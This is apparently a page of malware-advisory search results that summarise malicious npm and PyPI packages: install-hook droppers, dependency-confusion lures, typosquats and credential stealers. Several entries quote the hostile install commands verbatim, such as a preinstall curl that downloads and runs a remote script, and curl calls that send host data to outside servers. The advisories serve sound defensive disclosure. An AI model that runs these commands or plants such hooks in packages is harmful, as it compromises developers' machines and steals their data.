226591 matches found
Malicious code in @outmarket/ui (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7241a2e167db383267fa82ce9660a44f7bcca4b6d4f11bb7ca85eaa6b432a47e package.json declares a postinstall script that runs automatically on npm install and performs require'https'.get... to a Burp Collaborator subdomain...
Malicious code in @outmarket/utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2cd90f0d706cda01a5740f120f6e8d22ae57d907a5000854439c201b3c53a8c0 package.json declares a postinstall lifecycle script that fires automatically on npm install. The inline node -e payload uses hex-encoded property...
Malicious code in airbnb-airlock (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 034fd98a2ccd98f2bec2201d130c5a102ad17907c37af34b5162592e26a0fd43 The package's preinstall lifecycle hook in package.json runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js, fetching an unpinne...
Malicious code in ttal2ttml (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 29387ac35a2248ad2e4b287b8c082f8d1a8d03b4937fc84a5b81fb85697e19d4 package.json declares a preinstall lifecycle script that runs node -e "tryrequire'childprocess'.execSync'curl -sf...
Malicious code in kdrive-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3e7d5af5ddf22d4481fca4847a45189e6160a723341b32dcbb6bf51b49f53943 package.json declares a preinstall lifecycle script that auto-executes on npm install and runs wget -q -O-...
Malicious code in cue-mcp (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5dce71f7cd453bd73a138279dd78ebc607d7c4f6b171bd3b76c7f456a6eb907a The package's postinstall.js script runs automatically on npm install and collects host identifying data os.hostname along with process environment...
Malicious code in tree-sitter-forth (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 16f52e13ffb66b20f7c3dca7022e8115dbce1f39264638d38b73d6488e4cbf27 Package is a dependency-confusion lure: it claims version 9999.99.99 with description 'npm 404 error referenced in AlexanderBrevig/tree-sitter-forth'...
Malicious code in myebaynode (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 12d56c05672731322d45fb9273fb782a6b8042260fb019b2d96c755eed084fc3 package.json declares a preinstall lifecycle hook that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js, fetching JavaScript...
Malicious code in new-helper (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware cabb68bd9f2c4312904814f7c0c11aae7f93772a5c46c28a1ca8292592c83a53 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in new-solt-1 (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 548ecaba7e63993f2d3c88cfb13098ae8b6c69161e2e748bd8b931dcbaec8c7b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in new-ecro-helper (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f0826d146dbc513ac14f403eaa9ba65dffbd04da52c55ff1840ad153dab96e87 The package publishes verbatim big.js v7.0.1 source including the upstream copyright header, README, repository URL pointing to MikeMcl/big.js, and t...
Malicious code in new-solt (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 0cb151695f19820479204dd7c0cc067a235aaffbb89340888bd79a39b8e6070c Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in poly-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware bad67795c6c211a5048719f791c96b16470f4954efcd7b3d450328ef4328d7a8 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in toorc (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2cfd36909e089f17439dd3227c6f5ccef2fef2964dc26bbdbaaef0481b54615d On pip install and even pip download, the package's setup.py overrides the install and egginfo commands to execute a RunCommand routine that serializ...
Malicious code in equest (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cfe07e7f1e241dde491d3d6f5553ed2247a6f8e1dfdf34b0eaa9943a2cba5094 The package name equest is a one-character deletion of the widely-used requests package and ships no functional library code. setup.py registers cust...
Malicious code in ts-numbering (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware eb07d5e37bf31a4dfe653c7c9634f145ad50c518ad9084c7fdbe893c9fe3da46 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in local-ip-helper (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 62edd1422ec623ef603b4c1d5bf898041000bb1a55470dc798519bdb4e0452b5 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in libsignal-node-travatiger (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 853bda071feb857da7ff2ecaa7809099b31dd181eed007bb9593b0e274e8a8be Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in ip-rotat (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e85ab2724beee13bb6c2658c5bf5d50069c83619f062d39935226ff1fee1c0a3 On pip install or pip download, setup.py registers overridden install and egginfo cmdclass entries that execute ps -elf to capture the host's process...
Malicious code in ts-wross (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 42dae43b7ff77748f10ae5faf6d87b7d63552e5629a37c931ea2c0de3539b469 Package is published under the name ts-wross but its package.json claims authorship by Michael Mclaughlin [email protected] and points its repository...
Malicious code in node-core-libs (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d33f74e3f73fd5580ecf994b7db0349ee540754d65d4467b8b04b8c79e3d257b scripts/postinstall.js runs automatically on npm install Windows only and behaves as a classic install-time dropper. It XOR-decodes key 0x5A a...
Malicious code in search-from-search (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 06e2e600c7cba50d7cc3cbff52a18f77e508ec66be3a50cd4960f84771598548 package.json registers node callback.js as both preinstall and postinstall, so the payload runs automatically on npm install. callback.js collects th...
Malicious code in @ts-apis/ts-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector eccf08a9ba188be941f42f0b088d51fc5b1e84802fe9bd1d1218a6b71a6e2c11 The published tarball's dist/index.js contains an obfuscated payload that runs at require time inside a setTimeout-wrapped IIFE, completely unrelated...
Malicious code in web3-token-helper (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0c826bf782895b60580b94e3a28a2c4562d3742420ce81e9895ad8568da57890 The package advertises itself as a Web3 fee utility but its main export is a dropper. index.js line 140 base64-decodes a platform-specific command...
Malicious code in zod-pino (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c536e5a7ee3d5542e1ac822b30ba4525e52b2ae0c964d0c2470468d91b9b41c8 The package is published under a name suggesting a Pino logger integration for Zod, but the tarball contents do not match that purpose and exhibit...
Malicious code in @variational/common-ui (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 75a12ea18e08fc325a5698f1da2246ffdfdaa4650971fa2b335fd0904e517079 The package is advertised as 'Shared UI constants and utilities' but lib/index.js executes a malicious payload on require. Sensitive strings hostname...
Malicious code in node-fetch-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 78aef0d64a7d761d2987d27aea462083425e5692475cd81332b7a3152c754308 On Windows, scripts/postinstall.js XOR-decodes a hardcoded C2 host node22.lunes.host:3258, authenticates with a 5-minute rolling HMAC-SHA256 token,...
Malicious code in vitest-cli (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 27abcc7f2373309feb253b0cc48b1a8bae7c54a3c43aed0c57add697f4067aba Package name vitest-cli impersonates the official Vitest project while declaring empty author, homepage, repository, and bugs metadata. The...
Malicious code in zomato-mcp (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a23c3c63a9064636250be7dffa3781af0f9cdfcfd11a8da875be470c6952033e On npm install, the package's preinstall lifecycle script runs curl against http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/install/ carrying the...
Malicious code in zomato-espresso (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 860464bbcd3d56375d93025e494e39a6652bb7d115fb581ee088474a66786c3d Package is a dependency-confusion lure targeting Zomato's internal namespace. package.json declares a preinstall hook that runs curl on every npm...
Malicious code in zomato-core (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d5042b2ca8b8b3ba1f073344762615dc532864913af3f54a16540d44dde97ba5 package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami output, current working directory, and the...
Malicious code in sn-internal-testjgsakjdkjadkjah (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fd1a751946e8be92bbd0b675c57b3389e1e54919a69f5f6fef414a16cc2f1261 package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On npm install, th...
Malicious code in test-package-sajsdkashdj (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 62645375d713992c0b37f646ed3cf898e0ea2b56777ca1b531b3d6ee61d93b87 package.json declares a preinstall lifecycle script: "curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js". On every npm install, the...
Malicious code in search-from-feed (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c9291507e6e48bff8b92fcd9dd1f51345077f59aae2692f3d7ca84a8c0581b04 [email protected] is a dependency-confusion attack package. package.json declares both preinstall and postinstall as node callback.js, so the...
Malicious code in gd-auth-client (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4de00613e21b42bf3c651995beae63ff9d85772b9370145152d172a062be4fb7 package.json declares preinstall: node index.js, which runs automatically on npm install. index.js requires os, dns, https, querystring, and the loca...
Malicious code in forge-jsx4 (npm)
forge-jsx4 is a remote access trojan RAT published to the public npm registry by the account rafaelsilva [email protected]. Versions 1.0.122 and 1.0.123 were published on June 21-22, 2026 as a reconstitution of the forge-jsx / forge-jsxy campaign, reusing the same command-and-control...
Malicious code in @petitcode/eb-retry (npm)
@petitcode/eb-retry malicious version 1.3.5, published by [email protected] is a trojanized npm package belonging to the wshu.net credential-stealer campaign. The campaign published trojanized look-alike utility packages across 12+ scopes whose publisher accounts all follow the pattern...
Malicious code in @zynkit/jwtbytes (npm)
@zynkit/jwtbytes malicious version 0.5.3, published by [email protected] is a trojanized npm package belonging to the wshu.net credential-stealer campaign. The campaign published trojanized look-alike utility packages across 12+ scopes whose publisher accounts all follow the pattern...
Malicious code in @thymelab/logfx (npm)
@thymelab/logfx malicious version 2.15.5, published by [email protected] is a trojanized npm package belonging to the wshu.net credential-stealer campaign. The campaign published trojanized look-alike utility packages across 12+ scopes whose publisher accounts all follow the pattern...
Malicious code in @frostnode/waitfor (npm)
@frostnode/waitfor malicious versions 0.9.0, 0.10.3, 0.10.4, and 0.10.5, published by [email protected] is a trojanized npm package belonging to the wshu.net credential-stealer campaign. The campaign published trojanized look-alike utility packages across 12+ scopes whose publisher accoun...
Malicious code in onboarding-respects-modal (npm)
onboarding-respects-modal is a dependency confusion proof-of-concept package published to the public npm registry by the account r0binak and self-labeled "Security research PoC - Dependency Confusion Hunter". It was published at the artificially high version 999.99.99, a floating-version bait use...
Malicious code in @nullzero/urlcat (npm)
@nullzero/urlcat version 1.4.2, published by [email protected] is a trojanized npm package belonging to the wshu.net credential-stealer campaign. The campaign published trojanized look-alike utility packages across 12+ scopes whose publisher accounts all follow the pattern [email protected], with...
Malicious code in @tinyfox/shapecheck (npm)
@tinyfox/shapecheck malicious version 0.8.7, published by [email protected] is a trojanized npm package belonging to the wshu.net credential-stealer campaign. The campaign published trojanized look-alike utility packages across 12+ scopes whose publisher accounts all follow the pattern...
Malicious code in respects-switch (npm)
respects-switch is a dependency confusion proof-of-concept package published to the public npm registry by the account r0binak and self-labeled "Security research PoC - Dependency Confusion Hunter". It was published at the artificially high version 999.0.0, the canonical floating-version bait use...
Malicious code in @glitchpad/throttler (npm)
@glitchpad/throttler malicious version 2.2.3, published by [email protected] is a trojanized npm package belonging to the wshu.net credential-stealer campaign. The campaign published trojanized look-alike utility packages across 12+ scopes whose publisher accounts all follow the pattern...
Malicious code in @lazyutil/dater (npm)
@lazyutil/dater malicious versions 0.8.1, 0.9.2, 0.9.3, and 0.9.4, published by [email protected] is a trojanized npm package belonging to the wshu.net credential-stealer campaign. The campaign published trojanized look-alike utility packages across 12+ scopes whose publisher accounts all...
Malicious code in crud-respect (npm)
crud-respect is a dependency confusion proof-of-concept package published to the public npm registry by the account r0binak and self-labeled "Security research PoC - Dependency Confusion Hunter". It was published at the artificially high version 999.99.99, a floating-version bait used to outrank ...
Malicious code in inversiones-common (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 347a767ebbbb5843e6b005c167d98c9ab7b3ea943fadd88401682f2a2b14b2a4 setup.py executes a beacon function at module top level before setup is called, so the payload fires automatically on pip install inversiones-common...
Malicious code in fork-angular-daterangepicker (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d81ecc9a5b511f1d867597c3834e62c3c174209ba7718db45bf27af5d862d90f package.json declares a preinstall lifecycle hook "preinstall": "node index.js" that runs index.js on every npm install. index.js line 3 hardcodes...
Malicious code in hyperpure-core (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 47dd43b980c7b5e3230ee57e6974d40804e54997ed88877ced301402dbcdef4c Package impersonates a Zomato internal namespace name hyperpure-core, repository URL pointing to github.com/zomato/hyperpure-core while shipping a...